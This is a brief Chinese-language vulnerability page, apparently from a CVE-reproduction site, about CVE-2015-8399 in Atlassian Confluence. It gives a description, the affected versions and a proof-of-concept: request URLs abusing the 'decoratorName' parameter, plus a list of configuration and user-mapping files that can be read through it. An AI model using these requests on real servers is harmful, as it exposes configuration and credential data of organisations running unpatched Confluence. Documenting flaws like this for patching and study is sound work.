CVE-2015-8399

漏洞描述：Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。

Atlassian Confluence 5.8.17之前版本中存在安全，该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤‘decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。

影响版本：5.2 / 5.8.14 / 5.8.15

POC：

[PoC]
http:///spaces/viewdefaultdecorator.action?decoratorName=
http:///admin/viewdefaultdecorator.action?decoratorName=

        This is an example of accepted  parameters
        /WEB-INF/decorators.xml
        /WEB-INF/glue-config.xml
        /WEB-INF/server-config.wsdd
        /WEB-INF/sitemesh.xml
        /WEB-INF/urlrewrite.xml
        /WEB-INF/web.xml
        /databaseSubsystemContext.xml
        /securityContext.xml
        /services/statusServiceContext.xml
        com/atlassian/confluence/security/SpacePermission.hbm.xml
        com/atlassian/confluence/user/OSUUser.hbm.xml
        com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
        com/atlassian/confluence/user/ConfluenceUser.hbm.xml

部分文章采集于互联网，若侵权请联系删除！

THE END

CVE复现最近更新

【初级】confluence 信息泄露

CVE-2015-8399